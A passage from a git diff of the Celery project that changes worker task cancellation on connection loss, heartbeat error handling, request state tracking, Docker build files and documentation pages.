+ # double underscore these names to avoid shadowing anything and
+ # potentially getting confused by the superclass turning these into
+ # something other than an `Event` instance (e.g. a `bool`)
+ self.__is_shutdown = threading.Event()
+ self.__is_stopped = threading.Event()
self.mutex = threading.Lock()
self.not_empty = threading.Condition(self.mutex)
self.daemon = True
- self.name = 'Timer-{}'.format(next(self._timer_count))
+ self.name = f'Timer-{next(self._timer_count)}'
def _next_entry(self):
with self.not_empty:
@@ -71,7 +75,7 @@ def run(self):
self.running = True
self.scheduler = iter(self.schedule)
- while not self._is_shutdown.isSet():
+ while not self.__is_shutdown.is_set():
delay = self._next_entry()
if delay:
if self.on_tick:
@@ -80,7 +84,7 @@ def run(self):
break
sleep(delay)
try:
- self._is_stopped.set()
+ self.__is_stopped.set()
except TypeError: # pragma: no cover
# we lost the race at interpreter shutdown,
# so gc collected built-in modules.
@@ -91,9 +95,9 @@ def run(self):
os._exit(1)
def stop(self):
- self._is_shutdown.set()
+ self.__is_shutdown.set()
if self.running:
- self._is_stopped.wait()
+ self.__is_stopped.wait()
self.join(THREAD_TIMEOUT_MAX)
self.running = False
diff --git a/celery/worker/consumer/consumer.py b/celery/worker/consumer/consumer.py
index a3fd0afde73..c72493f5d02 100644
--- a/celery/worker/consumer/consumer.py
+++ b/celery/worker/consumer/consumer.py
@@ -7,6 +7,7 @@
import errno
import logging
import os
+import warnings
from collections import defaultdict
from time import sleep
@@ -21,7 +22,8 @@
from celery import bootsteps, signals
from celery.app.trace import build_tracer
-from celery.exceptions import InvalidTaskError, NotRegistered
+from celery.exceptions import (CPendingDeprecationWarning, InvalidTaskError,
+ NotRegistered)
from celery.utils.functional import noop
from celery.utils.log import get_logger
from celery.utils.nodenames import gethostname
@@ -29,8 +31,8 @@
from celery.utils.text import truncate
from celery.utils.time import humanize_seconds, rate
from celery.worker import loops
-from celery.worker.state import (maybe_shutdown, reserved_requests,
- task_reserved)
+from celery.worker.state import (active_requests, maybe_shutdown,
+ reserved_requests, task_reserved)
__all__ = ('Consumer', 'Evloop', 'dump_body')
@@ -106,6 +108,19 @@
delivery_info:{3} headers={4}}}
"""
+TERMINATING_TASK_ON_RESTART_AFTER_A_CONNECTION_LOSS = """\
+Task %s cannot be acknowledged after a connection loss since late acknowledgement is enabled for it.
+Terminating it instead.
+"""
+
+CANCEL_TASKS_BY_DEFAULT = """
+In Celery 5.1 we introduced an optional breaking change which
+on connection loss cancels all currently executed tasks with late acknowledgement enabled.
+These tasks cannot be acknowledged as the connection is gone, and the tasks are automatically redelivered back to the queue.
+You can enable this behavior using the worker_cancel_long_running_tasks_on_connection_loss setting.
+In Celery 5.1 it is set to False by default. The setting will be set to True by default in Celery 6.0.
+""" # noqa: E501
+
def dump_body(m, body):
"""Format message body for debugging purposes."""
@@ -257,7 +272,7 @@ def _update_prefetch_count(self, index=0):
def _update_qos_eventually(self, index):
return (self.qos.decrement_eventually if index < 0
else self.qos.increment_eventually)(
- abs(index) * self.prefetch_multiplier)
+ abs(index) * self.prefetch_multiplier)
def _limit_move_to_pool(self, request):
task_reserved(request)
@@ -336,6 +351,15 @@ def on_connection_error_after_connected(self, exc):
except Exception: # pylint: disable=broad-except
pass
+ if self.app.conf.worker_cancel_long_running_tasks_on_connection_loss:
+ for request in tuple(active_requests):
+ if request.task.acks_late and not request.acknowledged:
+ warn(TERMINATING_TASK_ON_RESTART_AFTER_A_CONNECTION_LOSS,
+ request)
+ request.cancel(self.pool)
+ else:
+ warnings.warn(CANCEL_TASKS_BY_DEFAULT, CPendingDeprecationWarning)
+
def register_with_event_loop(self, hub):
self.blueprint.send_all(
self, 'register_with_event_loop', args=(hub,),
@@ -487,7 +511,8 @@ def on_unknown_message(self, body, message):
signals.task_rejected.send(sender=self, message=message, exc=None)
def on_unknown_task(self, body, message, exc):
- error(UNKNOWN_TASK_ERROR, exc, dump_body(message, body), exc_info=True)
+ error(UNKNOWN_TASK_ERROR, exc, dump_body(message, body),
+ exc_info=True)
try:
id_, name = message.headers['id'], message.headers['task']
root_id = message.headers.get('root_id')
@@ -515,7 +540,8 @@ def on_unknown_task(self, body, message, exc):
)
def on_invalid_task(self, body, message, exc):
- error(INVALID_TASK_ERROR, exc, dump_body(message, body), exc_info=True)
+ error(INVALID_TASK_ERROR, exc, dump_body(message, body),
+ exc_info=True)
message.reject_log_error(logger, self.connection_errors)
signals.task_rejected.send(sender=self, message=message, exc=exc)
@@ -539,7 +565,7 @@ def on_task_received(message):
# will defer deserializing the message body to the pool.
payload = None
try:
- type_ = message.headers['task'] # protocol v2
+ type_ = message.headers['task'] # protocol v2
except TypeError:
return on_unknown_message(None, message)
except KeyError:
diff --git a/celery/worker/control.py b/celery/worker/control.py
index 9d8a6797dee..197d0c4d617 100644
--- a/celery/worker/control.py
+++ b/celery/worker/control.py
@@ -187,7 +187,7 @@ def rate_limit(state, task_name, rate_limit, **kwargs):
"""Tell worker(s) to modify the rate limit for a task by type.
See Also:
- :attr:`celery.task.base.Task.rate_limit`.
+ :attr:`celery.app.task.Task.rate_limit`.
Arguments:
task_name (str): Type of task to set rate limit for.
@@ -310,6 +310,8 @@ def hello(state, from_node, revoked=None, **kwargs):
logger.info('sync with %s', from_node)
if revoked:
worker_state.revoked.update(revoked)
+ # Do not send expired items to the other worker.
+ worker_state.revoked.purge()
return {
'revoked': worker_state.revoked._data,
'clock': state.app.clock.forward(),
@@ -362,9 +364,9 @@ def reserved(state, **kwargs):
@inspect_command(alias='dump_active')
-def active(state, **kwargs):
+def active(state, safe=False, **kwargs):
"""List of tasks currently being executed."""
- return [request.info()
+ return [request.info(safe=safe)
for request in state.tset(worker_state.active_requests)]
diff --git a/celery/worker/loops.py b/celery/worker/loops.py
index b60d95c11de..0630e679fdd 100644
--- a/celery/worker/loops.py
+++ b/celery/worker/loops.py
@@ -26,11 +26,25 @@ def _quick_drain(connection, timeout=0.1):
def _enable_amqheartbeats(timer, connection, rate=2.0):
- if connection:
- tick = connection.heartbeat_check
- heartbeat = connection.get_heartbeat_interval() # negotiated
- if heartbeat and connection.supports_heartbeats:
- timer.call_repeatedly(heartbeat / rate, tick, (rate,))
+ heartbeat_error = [None]
+
+ if not connection:
+ return heartbeat_error
+
+ heartbeat = connection.get_heartbeat_interval() # negotiated
+ if not (heartbeat and connection.supports_heartbeats):
+ return heartbeat_error
+
+ def tick(rate):
+ try:
+ connection.heartbeat_check(rate)
+ except Exception as e:
+ # heartbeat_error is passed by reference can be updated
+ # no append here list should be fixed size=1
+ heartbeat_error[0] = e
+
+ timer.call_repeatedly(heartbeat / rate, tick, (rate,))
+ return heartbeat_error
def asynloop(obj, connection, consumer, blueprint, hub, qos,
@@ -42,7 +56,7 @@ def asynloop(obj, connection, consumer, blueprint, hub, qos,
on_task_received = obj.create_task_handler()
- _enable_amqheartbeats(hub.timer, connection, rate=hbrate)
+ heartbeat_error = _enable_amqheartbeats(hub.timer, connection, rate=hbrate)
consumer.on_message = on_task_received
obj.controller.register_with_event_loop(hub)
@@ -70,6 +84,8 @@ def asynloop(obj, connection, consumer, blueprint, hub, qos,
try:
while blueprint.state == RUN and obj.connection:
state.maybe_shutdown()
+ if heartbeat_error[0] is not None:
+ raise heartbeat_error[0]
# We only update QoS when there's no more messages to read.
# This groups together qos calls, and makes sure that remote
@@ -95,8 +111,9 @@ def synloop(obj, connection, consumer, blueprint, hub, qos,
RUN = bootsteps.RUN
on_task_received = obj.create_task_handler()
perform_pending_operations = obj.perform_pending_operations
+ heartbeat_error = [None]
if getattr(obj.pool, 'is_green', False):
- _enable_amqheartbeats(obj.timer, connection, rate=hbrate)
+ heartbeat_error = _enable_amqheartbeats(obj.timer, connection, rate=hbrate)
consumer.on_message = on_task_received
consumer.consume()
@@ -104,6 +121,8 @@ def synloop(obj, connection, consumer, blueprint, hub, qos,
while blueprint.state == RUN and obj.connection:
state.maybe_shutdown()
+ if heartbeat_error[0] is not None:
+ raise heartbeat_error[0]
if qos.prev != qos.value:
qos.update()
try:
diff --git a/celery/worker/request.py b/celery/worker/request.py
index 81c3387d98a..fb6d60e6812 100644
--- a/celery/worker/request.py
+++ b/celery/worker/request.py
@@ -13,9 +13,9 @@
from kombu.utils.encoding import safe_repr, safe_str
from kombu.utils.objects import cached_property
-from celery import signals
+from celery import current_app, signals
from celery.app.task import Context
-from celery.app.trace import trace_task, trace_task_ret
+from celery.app.trace import fast_trace_task, trace_task, trace_task_ret
from celery.exceptions import (Ignore, InvalidTaskError, Reject, Retry,
TaskRevokedError, Terminated,
TimeLimitExceeded, WorkerLostError)
@@ -50,11 +50,12 @@ def __optimize__():
_does_info = logger.isEnabledFor(logging.INFO)
-__optimize__() # noqa: E305
+__optimize__()
# Localize
tz_or_local = timezone.tz_or_local
send_revoked = signals.task_revoked.send
+send_retry = signals.task_retry.send
task_accepted = state.task_accepted
task_ready = state.task_ready
@@ -69,6 +70,7 @@ class Request:
worker_pid = None
time_limits = (None, None)
_already_revoked = False
+ _already_cancelled = False
_terminate_on_ack = None
_apply_result = None
_tzlocal = None
@@ -91,7 +93,8 @@ def __init__(self, message, on_ack=noop,
maybe_make_aware=maybe_make_aware,
maybe_iso8601=maybe_iso8601, **opts):
self._message = message
- self._request_dict = message.headers if headers is None else headers
+ self._request_dict = (message.headers.copy() if headers is None
+ else headers.copy())
self._body = message.body if body is None else body
self._app = app
self._utc = utc
@@ -120,6 +123,7 @@ def __init__(self, message, on_ack=noop,
self._eventer = eventer
self._connection_errors = connection_errors or ()
self._task = task or self._app.tasks[self._type]
+ self._ignore_result = self._request_dict.get('ignore_result', False)
# timezone means the message is timezone-aware, and the only timezone
# supported at this point is UTC.
@@ -154,6 +158,7 @@ def __init__(self, message, on_ack=noop,
'redelivered': delivery_info.get('redelivered'),
}
self._request_dict.update({
+ 'properties': properties,
'reply_to': properties.get('reply_to'),
'correlation_id': properties.get('correlation_id'),
'hostname': self._hostname,
@@ -240,6 +245,10 @@ def on_reject(self, value):
def hostname(self):
return self._hostname
+ @property
+ def ignore_result(self):
+ return self._ignore_result
+
@property
def eventer(self):
return self._eventer
@@ -284,7 +293,7 @@ def task_id(self):
# XXX compat
return self.id
- @task_id.setter # noqa
+ @task_id.setter
def task_id(self, value):
self.id = value
@@ -293,7 +302,7 @@ def task_name(self):
# XXX compat
return self.name
- @task_name.setter # noqa
+ @task_name.setter
def task_name(self, value):
self.name = value
@@ -302,6 +311,10 @@ def reply_to(self):
# used by rpc backend when failures reported by parent process
return self._request_dict['reply_to']
+ @property
+ def replaced_task_nesting(self):
+ return self._request_dict.get('replaced_task_nesting', 0)
+
@property
def correlation_id(self):
# used similarly to reply_to
@@ -323,8 +336,9 @@ def execute_using_pool(self, pool, **kwargs):
raise TaskRevokedError(task_id)
time_limit, soft_time_limit = self.time_limits
+ trace = fast_trace_task if self._app.use_fast_trace_task else trace_task_ret
result = pool.apply_async(
- trace_task_ret,
+ trace,
args=(self._type, task_id, self._request_dict, self._body,
self._content_type, self._content_encoding),
accept_callback=self.on_accepted,
@@ -393,6 +407,30 @@ def terminate(self, pool, signal=None):
if obj is not None:
obj.terminate(signal)
+ def cancel(self, pool, signal=None):
+ signal = _signals.signum(signal or TERM_SIGNAME)
+ if self.time_start:
+ pool.terminate_job(self.worker_pid, signal)
+ self._announce_cancelled()
+
+ if self._apply_result is not None:
+ obj = self._apply_result() # is a weakref
+ if obj is not None:
+ obj.terminate(signal)
+
+ def _announce_cancelled(self):
+ task_ready(self)
+ self.send_event('task-cancelled')
+ reason = 'cancelled by Celery'
+ exc = Retry(message=reason)
+ self.task.backend.mark_as_retry(self.id,
+ exc,
+ request=self._context)
+
+ self.task.on_retry(exc, self.id, self.args, self.kwargs, None)
+ self._already_cancelled = True
+ send_retry(self.task, request=self._context, einfo=None)
+
def _announce_revoked(self, reason, terminated, signum, expired):
task_ready(self)
self.send_event('task-revoked',
@@ -465,7 +503,7 @@ def on_success(self, failed__retval__runtime, **kwargs):
if isinstance(retval.exception, (SystemExit, KeyboardInterrupt)):
raise retval.exception
return self.on_failure(retval, return_ok=True)
- task_ready(self)
+ task_ready(self, successful=True)
if self.task.acks_late:
self.acknowledge()
@@ -484,24 +522,41 @@ def on_retry(self, exc_info):
def on_failure(self, exc_info, send_failed_event=True, return_ok=False):
"""Handler called if the task raised an exception."""
task_ready(self)
- if isinstance(exc_info.exception, MemoryError):
- raise MemoryError(f'Process got: {exc_info.exception}')
- elif isinstance(exc_info.exception, Reject):
- return self.reject(requeue=exc_info.exception.requeue)
- elif isinstance(exc_info.exception, Ignore):
- return self.acknowledge()
-
exc = exc_info.exception
- if isinstance(exc, Retry):
+ is_terminated = isinstance(exc, Terminated)
+ if is_terminated:
+ # If the task was terminated and the task was not cancelled due
+ # to a connection loss, it is revoked.
+
+ # We always cancel the tasks inside the master process.
+ # If the request was cancelled, it was not revoked and there's
+ # nothing to be done.
+ # According to the comment below, we need to check if the task
+ # is already revoked and if it wasn't, we should announce that
+ # it was.
+ if not self._already_cancelled and not self._already_revoked:
+ # This is a special case where the process
+ # would not have had time to write the result.
+ self._announce_revoked(
+ 'terminated', True, str(exc), False)
+ return
+ elif isinstance(exc, MemoryError):
+ raise MemoryError(f'Process got: {exc}')
+ elif isinstance(exc, Reject):
+ return self.reject(requeue=exc.requeue)
+ elif isinstance(exc, Ignore):
+ return self.acknowledge()
+ elif isinstance(exc, Retry):
return self.on_retry(exc_info)
# (acks_late) acknowledge after result stored.
requeue = False
+ is_worker_lost = isinstance(exc, WorkerLostError)
if self.task.acks_late:
reject = (
self.task.reject_on_worker_lost and
- isinstance(exc, WorkerLostError)
+ is_worker_lost
)
ack = self.task.acks_on_failure_or_timeout
if reject:
@@ -515,19 +570,21 @@ def on_failure(self, exc_info, send_failed_event=True, return_ok=False):
# need to be removed from prefetched local queue
self.reject(requeue=False)
- # These are special cases where the process would not have had time
+ # This is a special case where the process would not have had time
# to write the result.
- if isinstance(exc, Terminated):
- self._announce_revoked(
- 'terminated', True, str(exc), False)
- send_failed_event = False # already sent revoked event
- elif not requeue and (isinstance(exc, WorkerLostError) or not return_ok):
+ if not requeue and (is_worker_lost or not return_ok):
# only mark as failure if task has not been requeued
self.task.backend.mark_as_failure(
self.id, exc, request=self._context,
store_result=self.store_errors,
)
+ signals.task_failure.send(sender=self.task, task_id=self.id,
+ exception=exc, args=self.args,
+ kwargs=self.kwargs,
+ traceback=exc_info.traceback,
+ einfo=exc_info)
+
if send_failed_event:
self.send_event(
'task-failed',
@@ -555,8 +612,8 @@ def info(self, safe=False):
return {
'id': self.id,
'name': self.name,
- 'args': self._args,
- 'kwargs': self._kwargs,
+ 'args': self._args if not safe else self._argsrepr,
+ 'kwargs': self._kwargs if not safe else self._kwargsrepr,
'type': self._type,
'hostname': self._hostname,
'time_start': self.time_start,
@@ -574,7 +631,7 @@ def __str__(self):
self.humaninfo(),
f' ETA:[{self._eta}]' if self._eta else '',
f' expires:[{self._expires}]' if self._expires else '',
- ])
+ ]).strip()
def __repr__(self):
"""``repr(self)``."""
@@ -629,13 +686,16 @@ def group_index(self):
def create_request_cls(base, task, pool, hostname, eventer,
ref=ref, revoked_tasks=revoked_tasks,
- task_ready=task_ready, trace=trace_task_ret):
+ task_ready=task_ready, trace=None, app=current_app):
default_time_limit = task.time_limit
default_soft_time_limit = task.soft_time_limit
apply_async = pool.apply_async
acks_late = task.acks_late
events = eventer and eventer.enabled
+ if trace is None:
+ trace = fast_trace_task if app.use_fast_trace_task else trace_task_ret
+
class Request(base):
def execute_using_pool(self, pool, **kwargs):
diff --git a/celery/worker/state.py b/celery/worker/state.py
index aa8782546c4..3afb2e8e3b9 100644
--- a/celery/worker/state.py
+++ b/celery/worker/state.py
@@ -34,10 +34,17 @@
#: maximum number of revokes to keep in memory.
REVOKES_MAX = 50000
+#: maximum number of successful tasks to keep in memory.
+SUCCESSFUL_MAX = 1000
+
#: how many seconds a revoke will be active before
#: being expired when the max limit has been exceeded.
REVOKE_EXPIRES = 10800
+#: how many seconds a successful task will be cached in memory
+#: before being expired when the max limit has been exceeded.
+SUCCESSFUL_EXPIRES = 10800
+
#: Mapping of reserved task_id->Request.
requests = {}
@@ -47,6 +54,10 @@
#: set of currently active :class:`~celery.worker.request.Request`'s.
active_requests = weakref.WeakSet()
+#: A limited set of successful :class:`~celery.worker.request.Request`'s.
+successful_requests = LimitedSet(maxlen=SUCCESSFUL_MAX,
+ expires=SUCCESSFUL_EXPIRES)
+
#: count of tasks accepted by the worker, sorted by type.
total_count = Counter()
@@ -64,6 +75,7 @@ def reset_state():
requests.clear()
reserved_requests.clear()
active_requests.clear()
+ successful_requests.clear()
total_count.clear()
all_total_count[:] = [0]
revoked.clear()
@@ -98,10 +110,14 @@ def task_accepted(request,
def task_ready(request,
+ successful=False,
remove_request=requests.pop,
discard_active_request=active_requests.discard,
discard_reserved_request=reserved_requests.discard):
"""Update global state when a task is ready."""
+ if successful:
+ successful_requests.add(request.id)
+
remove_request(request.id, None)
discard_active_request(request)
discard_reserved_request(request)
@@ -137,7 +153,7 @@ def on_shutdown():
sum(bench_sample) / len(bench_sample)))
memdump()
- def task_reserved(request): # noqa
+ def task_reserved(request):
"""Called when a task is reserved by the worker."""
global bench_start
global bench_first
@@ -149,7 +165,7 @@ def task_reserved(request): # noqa
return __reserved(request)
- def task_ready(request): # noqa
+ def task_ready(request):
"""Called when a task is completed."""
global all_count
global bench_start
diff --git a/celery/worker/strategy.py b/celery/worker/strategy.py
index 64d3c5337f2..b6e9a17c6b6 100644
--- a/celery/worker/strategy.py
+++ b/celery/worker/strategy.py
@@ -2,8 +2,10 @@
import logging
from kombu.asynchronous.timer import to_timestamp
+from kombu.utils.encoding import safe_repr
from celery import signals
+from celery.app import trace as _app_trace
from celery.exceptions import InvalidTaskError
from celery.utils.imports import symbol_by_name
from celery.utils.log import get_logger
@@ -50,6 +52,7 @@ def hybrid_to_proto2(message, body):
'kwargsrepr': body.get('kwargsrepr'),
'origin': body.get('origin'),
}
+ headers.update(message.headers or {})
embed = {
'callbacks': body.get('callbacks'),
@@ -123,7 +126,7 @@ def default(task, app, consumer,
limit_task = consumer._limit_task
limit_post_eta = consumer._limit_post_eta
Request = symbol_by_name(task.Request)
- Req = create_request_cls(Request, task, consumer.pool, hostname, eventer)
+ Req = create_request_cls(Request, task, consumer.pool, hostname, eventer, app=app)
revoked_tasks = consumer.controller.state.revoked
@@ -147,7 +150,15 @@ def task_message_handler(message, body, ack, reject, callbacks,
body=body, headers=headers, decoded=decoded, utc=utc,
)
if _does_info:
- info('Received task: %s', req)
+ # Similar to `app.trace.info()`, we pass the formatting args as the
+ # `extra` kwarg for custom log handlers
+ context = {
+ 'id': req.id,
+ 'name': req.name,
+ 'args': safe_repr(req.args),
+ 'kwargs': safe_repr(req.kwargs),
+ }
+ info(_app_trace.LOG_RECEIVED, context, extra={'data': context})
if (req.expires or req.id in revoked_tasks) and req.revoked():
return
diff --git a/celery/worker/worker.py b/celery/worker/worker.py
index 382802a2738..f67d1a336da 100644
--- a/celery/worker/worker.py
+++ b/celery/worker/worker.py
@@ -38,7 +38,7 @@
try:
import resource
except ImportError: # pragma: no cover
- resource = None # noqa
+ resource = None
__all__ = ('WorkController',)
diff --git a/docker/Dockerfile b/docker/Dockerfile
index 403052787f8..0cd557070d0 100644
--- a/docker/Dockerfile
+++ b/docker/Dockerfile
@@ -1,10 +1,11 @@
-FROM ubuntu:bionic
+FROM ubuntu:focal
+ENV PYTHONUNBUFFERED 1
ENV PYTHONIOENCODING UTF-8
ARG DEBIAN_FRONTEND=noninteractive
-# Pypy is installed from a package manager because it takes so long to build.
+# Pypy3 is installed from a package manager because it takes so long to build.
RUN apt-get update && apt-get install -y build-essential \
libcurl4-openssl-dev \
libffi-dev \
@@ -22,7 +23,8 @@ RUN apt-get update && apt-get install -y build-essential \
libncurses5-dev \
libsqlite3-dev \
wget \
- pypy \
+ pypy3 \
+ pypy3-lib \
python-openssl \
libncursesw5-dev \
zlib1g-dev \
@@ -44,10 +46,10 @@ ENV PATH="$HOME/.pyenv/bin:$PATH"
# Copy and run setup scripts
WORKDIR $PROVISIONING
-COPY docker/scripts/install-couchbase.sh .
-# Scripts will lose thier executable flags on copy. To avoid the extra instructions
+#COPY docker/scripts/install-couchbase.sh .
+# Scripts will lose their executable flags on copy. To avoid the extra instructions
# we call the shell directly.
-RUN sh install-couchbase.sh
+#RUN sh install-couchbase.sh
COPY docker/scripts/create-linux-user.sh .
RUN sh create-linux-user.sh
@@ -64,13 +66,12 @@ COPY --chown=1000:1000 docker/entrypoint /entrypoint
RUN chmod gu+x /entrypoint
# Define the local pyenvs
-RUN pyenv local python3.8 python3.7 python3.6 python3.5 python2.7
+RUN pyenv local python3.8 python3.7 python3.6 python3.9
-RUN pyenv exec python2.7 -m pip install --upgrade pip setuptools wheel && \
- pyenv exec python3.5 -m pip install --upgrade pip setuptools wheel && \
- pyenv exec python3.6 -m pip install --upgrade pip setuptools wheel && \
+RUN pyenv exec python3.6 -m pip install --upgrade pip setuptools wheel && \
pyenv exec python3.7 -m pip install --upgrade pip setuptools wheel && \
- pyenv exec python3.8 -m pip install --upgrade pip setuptools wheel
+ pyenv exec python3.8 -m pip install --upgrade pip setuptools wheel && \
+ pyenv exec python3.9 -m pip install --upgrade pip setuptools wheel
# Setup one celery environment for basic development use
RUN pyenv exec python3.8 -m pip install \
@@ -94,19 +95,14 @@ RUN pyenv exec python3.8 -m pip install \
-r requirements/docs.txt \
-r requirements/test-integration.txt \
-r requirements/pkgutils.txt && \
- pyenv exec python3.5 -m pip install \
+ pyenv exec python3.9 -m pip install \
-r requirements/dev.txt \
-r requirements/test.txt \
-r requirements/test-ci-default.txt \
-r requirements/docs.txt \
-r requirements/test-integration.txt \
- -r requirements/pkgutils.txt && \
- pyenv exec python2.7 -m pip install \
- -r requirements/dev.txt \
- -r requirements/test.txt \
- -r requirements/test-ci-default.txt \
- -r requirements/test-integration.txt \
-r requirements/pkgutils.txt
+
COPY --chown=1000:1000 . $HOME/celery
diff --git a/docker/docker-compose.yml b/docker/docker-compose.yml
index 428fe204475..037947f35e0 100644
--- a/docker/docker-compose.yml
+++ b/docker/docker-compose.yml
@@ -36,4 +36,15 @@ services:
image: dwmkerr/dynamodb:38
azurite:
- image: arafato/azurite:2.6.5
+ image: mcr.microsoft.com/azure-storage/azurite:3.10.0
+
+ docs:
+ image: celery/docs
+ build:
+ context: ..
+ dockerfile: docker/docs/Dockerfile
+ volumes:
+ - ../docs:/docs:z
+ ports:
+ - "7000:7000"
+ command: /start-docs
\ No newline at end of file
diff --git a/docker/docs/Dockerfile b/docker/docs/Dockerfile
new file mode 100644
index 00000000000..616919f2b54
--- /dev/null
+++ b/docker/docs/Dockerfile
@@ -0,0 +1,29 @@
+FROM python:3.9-slim-buster
+
+ENV PYTHONUNBUFFERED 1
+ENV PYTHONDONTWRITEBYTECODE 1
+
+RUN apt-get update \
+ # dependencies for building Python packages
+ && apt-get install -y build-essential \
+ && apt-get install -y texlive \
+ && apt-get install -y texlive-latex-extra \
+ && apt-get install -y dvipng \
+ && apt-get install -y python3-sphinx \
+ # Translations dependencies
+ && apt-get install -y gettext \
+ # cleaning up unused files
+ && apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false \
+ && rm -rf /var/lib/apt/lists/*
+
+# # Requirements are installed here to ensure they will be cached.
+COPY /requirements /requirements
+
+# All imports needed for autodoc.
+RUN pip install -r /requirements/docs.txt -r /requirements/default.txt
+
+COPY docker/docs/start /start-docs
+RUN sed -i 's/\r$//g' /start-docs
+RUN chmod +x /start-docs
+
+WORKDIR /docs
\ No newline at end of file
diff --git a/docker/docs/start b/docker/docs/start
new file mode 100644
index 00000000000..9c0b4d4de1d
--- /dev/null
+++ b/docker/docs/start
@@ -0,0 +1,7 @@
+#!/bin/bash
+
+set -o errexit
+set -o pipefail
+set -o nounset
+
+make livehtml
\ No newline at end of file
diff --git a/docker/scripts/install-pyenv.sh b/docker/scripts/install-pyenv.sh
index c52a0b807c1..2f3093ced10 100644
--- a/docker/scripts/install-pyenv.sh
+++ b/docker/scripts/install-pyenv.sh
@@ -7,8 +7,7 @@ curl -L https://raw.githubusercontent.com/pyenv/pyenv-installer/master/bin/pyenv
git clone https://github.com/s1341/pyenv-alias.git $(pyenv root)/plugins/pyenv-alias
# Python versions to test against
-VERSION_ALIAS="python2.7" pyenv install 2.7.17
-VERSION_ALIAS="python3.5" pyenv install 3.5.8
-VERSION_ALIAS="python3.6" pyenv install 3.6.9
-VERSION_ALIAS="python3.7" pyenv install 3.7.5
-VERSION_ALIAS="python3.8" pyenv install 3.8.0
+VERSION_ALIAS="python3.6" pyenv install 3.6.12
+VERSION_ALIAS="python3.7" pyenv install 3.7.9
+VERSION_ALIAS="python3.8" pyenv install 3.8.7
+VERSION_ALIAS="python3.9" pyenv install 3.9.1
diff --git a/docs/Makefile b/docs/Makefile
index 3ec9ca41f78..cfed0cb0fdf 100644
--- a/docs/Makefile
+++ b/docs/Makefile
@@ -6,6 +6,8 @@ SPHINXOPTS =
SPHINXBUILD = sphinx-build
PAPER =
BUILDDIR = _build
+SOURCEDIR = .
+APP = /docs
# Internal variables.
PAPEROPT_a4 = -D latex_paper_size=a4
@@ -18,6 +20,7 @@ I18NSPHINXOPTS = $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) .
help:
@echo "Please use \`make ' where is one of"
@echo " html to make standalone HTML files"
+ @echo " livehtml to start a local server hosting the docs"
@echo " dirhtml to make HTML files named index.html in directories"
@echo " singlehtml to make a single large HTML file"
@echo " pickle to make pickle files"
@@ -231,3 +234,7 @@ pseudoxml:
$(SPHINXBUILD) -b pseudoxml $(ALLSPHINXOPTS) $(BUILDDIR)/pseudoxml
@echo
@echo "Build finished. The pseudo-XML files are in $(BUILDDIR)/pseudoxml."
+
+.PHONY: livehtml
+livehtml:
+ sphinx-autobuild -b html --host 0.0.0.0 --port 7000 --watch $(APP) -c . $(SOURCEDIR) $(BUILDDIR)/html
\ No newline at end of file
diff --git a/docs/_templates/sidebardonations.html b/docs/_templates/sidebardonations.html
index d6e6dfaa788..2eebc8ec0bc 100644
--- a/docs/_templates/sidebardonations.html
+++ b/docs/_templates/sidebardonations.html
@@ -1,13 +1,9 @@
-
-
Please help support this community project with a donation:
-
+
Donations
+
Please help support this community project with a donation.
+
+
+
diff --git a/docs/conf.py b/docs/conf.py
index 6c7dbc6aaad..f28a5c9c72b 100644
--- a/docs/conf.py
+++ b/docs/conf.py
@@ -10,7 +10,7 @@
github_project='celery/celery',
author='Ask Solem & contributors',
author_name='Ask Solem',
- copyright='2009-2018',
+ copyright='2009-2021',
publisher='Celery Project',
html_logo='images/celery_512.png',
html_favicon='images/favicon.ico',
@@ -23,13 +23,12 @@
],
extra_intersphinx_mapping={
'cyanide': ('https://cyanide.readthedocs.io/en/latest', None),
+ 'click': ('https://click.palletsprojects.com/en/7.x/', None),
},
apicheck_ignore_modules=[
'celery.__main__',
- 'celery.task',
'celery.contrib.testing',
'celery.contrib.testing.tasks',
- 'celery.task.base',
'celery.bin',
'celery.bin.celeryd_detach',
'celery.contrib',
diff --git a/docs/django/first-steps-with-django.rst b/docs/django/first-steps-with-django.rst
index 003edcc8b06..9c9a2f5bc8f 100644
--- a/docs/django/first-steps-with-django.rst
+++ b/docs/django/first-steps-with-django.rst
@@ -19,8 +19,8 @@ Using Celery with Django
.. note::
- Celery 4.0 supports Django 1.8 and newer versions. Please use Celery 3.1
- for versions older than Django 1.8.
+ Celery 5.0.x supports Django 1.11 LTS or newer versions. Please use Celery 4.4.x
+ for versions older than Django 1.11.
To use Celery with your Django project you must first define
an instance of the Celery library (called an "app")
@@ -54,15 +54,8 @@ for simple projects you may use a single contained module that defines
both the app and tasks, like in the :ref:`tut-celery` tutorial.
Let's break down what happens in the first module,
-first we import absolute imports from the future, so that our
-``celery.py`` module won't clash with the library:
-
-.. code-block:: python
-
- from __future__ import absolute_import
-
-Then we set the default :envvar:`DJANGO_SETTINGS_MODULE` environment variable
-for the :program:`celery` command-line program:
+first, we set the default :envvar:`DJANGO_SETTINGS_MODULE` environment
+variable for the :program:`celery` command-line program:
.. code-block:: python
@@ -97,6 +90,18 @@ setting becomes ``CELERY_BROKER_URL``. This also applies to the
workers settings, for instance, the :setting:`worker_concurrency`
setting becomes ``CELERY_WORKER_CONCURRENCY``.
+For example, a Django project's configuration file might include:
+
+.. code-block:: python
+ :caption: settings.py
+
+ ...
+
+ # Celery Configuration Options
+ CELERY_TIMEZONE = "Australia/Tasmania"
+ CELERY_TASK_TRACK_STARTED = True
+ CELERY_TASK_TIME_LIMIT = 30 * 60
+
You can pass the settings object directly instead, but using a string
is better since then the worker doesn't have to serialize the object.
The ``CELERY_`` namespace is also optional, but recommended (to
@@ -148,15 +153,6 @@ concrete app instance:
You can find the full source code for the Django example project at:
https://github.com/celery/celery/tree/master/examples/django/
-.. admonition:: Relative Imports
-
- You have to be consistent in how you import the task module.
- For example, if you have ``project.app`` in ``INSTALLED_APPS``, then you
- must also import the tasks ``from project.app`` or else the names
- of the tasks will end up being different.
-
- See :ref:`task-naming-relative-imports`
-
Extensions
==========
@@ -242,7 +238,7 @@ development it is useful to be able to start a worker instance by using the
.. code-block:: console
- $ celery -A proj worker -l info
+ $ celery -A proj worker -l INFO
For a complete listing of the command-line options available,
use the help command:
diff --git a/docs/getting-started/backends-and-brokers/index.rst b/docs/getting-started/backends-and-brokers/index.rst
new file mode 100644
index 00000000000..d50b0b5e526
--- /dev/null
+++ b/docs/getting-started/backends-and-brokers/index.rst
@@ -0,0 +1,101 @@
+.. _brokers:
+
+======================
+ Backends and Brokers
+======================
+
+:Release: |version|
+:Date: |today|
+
+Celery supports several message transport alternatives.
+
